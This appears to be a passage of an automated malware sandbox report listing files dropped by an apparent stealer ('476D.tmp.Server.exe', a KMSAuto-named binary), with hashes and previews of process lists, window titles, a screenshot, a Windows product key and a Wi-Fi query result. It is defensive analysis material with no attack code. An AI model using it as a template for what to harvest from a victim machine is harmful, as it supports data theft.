                                                                                                                                                                                                                                Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):282
                                                                                                                                                                                                                                Entropy (8bit):3.5191090305155277
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                                                                                                                                                                                                MD5:3A37312509712D4E12D27240137FF377
                                                                                                                                                                                                                                SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                                                                                                                                                                                                SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                                                                                                                                                                                                SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):190
                                                                                                                                                                                                                                Entropy (8bit):3.5497401529130053
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                                                                                                                                                                                MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                                                                                                                                                                                SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                                                                                                                                                                                SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                                                                                                                                                                                SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):190
                                                                                                                                                                                                                                Entropy (8bit):3.5497401529130053
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                                                                                                                                                                                                MD5:87A524A2F34307C674DBA10708585A5E
                                                                                                                                                                                                                                SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                                                                                                                                                                                                SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                                                                                                                                                                                                SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):504
                                                                                                                                                                                                                                Entropy (8bit):3.514398793376306
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                                                                                                                                                                                MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                                                                                                                                                                                SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                                                                                                                                                                                SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                                                                                                                                                                                SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):17264
                                                                                                                                                                                                                                Entropy (8bit):5.69544679328736
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:HzFXTdqBUEIctw2zqmTB9stgf9wBMwTmfJg1Wx1HJ2:HdTdqBUEI52mmYtE2MwTm6Wx1p2
                                                                                                                                                                                                                                MD5:29E1A048B32C8E36E6428FA8A51B16F3
                                                                                                                                                                                                                                SHA1:C1E0F9889350A3A5D0C98A670DBCB4DC43D0D07E
                                                                                                                                                                                                                                SHA-256:677FB402DA27C33F26575CD8FF127C631198593256B467263636A03213637611
                                                                                                                                                                                                                                SHA-512:D7B377293FFE09E6FF059C59C51945110EA48F3F6E45CE98535DEF76DDF98F0F36E1C284281140F103A4E281A208C763051757F08C0752C363D3B041E4CB8BBF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NAME: svchost..PID: 2152..EXE: ..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: WmiPrvSE..PID: 5164..EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 6456..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: dllhost..PID: 6024..EXE: C:\Windows\system32\DllHost.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 2144..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 6884..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: fontdrvhost..PID: 784..EXE: ..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: svchost..PID: 1176..EXE: ..NAME: svchost..PID: 2564..EXE: ..NAME: csrss..PID: 408..EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 6160..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqN
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                Entropy (8bit):3.814371943179627
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:IEqdVoq:IEqn9
                                                                                                                                                                                                                                MD5:07891FA9AD66325DD8D52FD3E1D9589A
                                                                                                                                                                                                                                SHA1:781C0458F84526977DC075FF0338F19170AFBA75
                                                                                                                                                                                                                                SHA-256:6DFC01037FEE4B222086A6F1EDF201BF7952C5B6F9090F30DD30320972632005
                                                                                                                                                                                                                                SHA-512:E8D7F00221CC9E681133506B27428384A3F96F62EB6AB749032D861396B160427BEC354AAECF3B062541F88D78CC389922D520DC7E1B1119182102950E72165E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:PJN2K-W4T8B-J6J38-PMMTG-MPDD4
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):84
                                                                                                                                                                                                                                Entropy (8bit):4.6630509827051725
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                                                                                                                                                                                                MD5:58CD2334CFC77DB470202487D5034610
                                                                                                                                                                                                                                SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                                                                                                                                                                                                SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                                                                                                                                                                                                SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):14637
                                                                                                                                                                                                                                Entropy (8bit):5.642697713926756
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:DyCayCDyCQNyCdyCcyCgyCFyCIyC8yCLyCuyCAyCUyCJyCoyCJyzFMfNyCSyCYy9:xyzqTc5J8Ed
                                                                                                                                                                                                                                MD5:9516B94F40084A0D5C091AC96ADF9C1C
                                                                                                                                                                                                                                SHA1:67135EA254D25BF55DAC1A3F99C96634D9B989E1
                                                                                                                                                                                                                                SHA-256:9758EDB4922E3FDC5B30F4E78D00A76C70C426058587F90005FECAC67FFAFBCD
                                                                                                                                                                                                                                SHA-512:F865376C17B0B428D76A5886118ED47DB6042CC8A85EAFD7C856F5EDC63C54FD81E8BF261BF8C6B56F93CB9C8FBB70ED15869B0FB03E84DBC5A4D704FC63F8A2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6456..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 2144..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6884..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6160..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6648..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Ch
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):76444
                                                                                                                                                                                                                                Entropy (8bit):7.772236064360945
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:C3IPMZurfQ4pchCNj4Sqzd3bG/KkifU8iwWuCrUfxrNgiMV/pU:eI0ZyI4pcgqzdr8XHXz4fHPMV/pU
                                                                                                                                                                                                                                MD5:108D62E094BD5022B9DD5F428F42E0D2
                                                                                                                                                                                                                                SHA1:762A43D03FC87553E5A1D0E0CF2CDF5C1995DA3B
                                                                                                                                                                                                                                SHA-256:BEEE6F91FFFF6B2087DD593DDFC7E067D5C5A6CF7DF9D60C8F9693E83C977BFE
                                                                                                                                                                                                                                SHA-512:0F6F4D8411F72D9C425B6B86AAAEC76A36A2436E5FA442AE0A0FC20C9B54C8238B63E6B65671E441CB4E6E5E2591EA08F074F94FC4F0ECD8DADF438F96514F6D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........;Yd@....1...m...g>....Vr....cFr....1mn..{}...D.q.........e..5.R....a..Y..z.8?.GZ...-5..JZ).J)h........;...zA...^.....^..g._k...v..gb..._.b.[............y..g.,.c..:...qtk..........Ek..E..s..Q@....-..Q.c>...6.:.uj*q.f.iJ..ba.]..#Z..6................j...>......_#.....D..7.....I..........J.j...Bt]..QEjb.QE....k;U......!%..3....Ft.......5.[...p.oo;~....l
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe
                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1281
                                                                                                                                                                                                                                Entropy (8bit):5.370111951859942
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                                                                                                                                                                MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                                                                                                                                                                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                                                                                                                                                                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                                                                                                                                                                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                                                                                                                                                                Process:C:\ProgramData\KMSAuto\accc.exe
                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):660
                                                                                                                                                                                                                                Entropy (8bit):5.38575581059626
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp151KDLI4MN5I/k1BakvoDLI4MWuPakEOsk7v:ML9E4KQ71qE4GIs0E4KD
                                                                                                                                                                                                                                MD5:E918A9A81162ACCFD3E06E02E11CB6C8
                                                                                                                                                                                                                                SHA1:10F02DAEDB20582256A5601EE8898CFA8DC2BDD5
                                                                                                                                                                                                                                SHA-256:912110B9095CDC4B124444955DD3ABAEFFB7C309A242A4B05299A26EC9920A21
                                                                                                                                                                                                                                SHA-512:78D9CABEFE698E54197D7D03ABC3AC36F3AAA2DE80CD79AD780B67324F36D7CA3560F642873E8C20F2BB27A9C892D9A2F21898E4B469FAFE35BA0FAEE8A7936A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1662
                                                                                                                                                                                                                                Entropy (8bit):5.358887818371853
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:MxHKlYHKh3oPtHo6hAHKzePHt1qHjHK9HK+HKoHx:iqlYqh3oPtI6eqzGNwDq9q+qoR
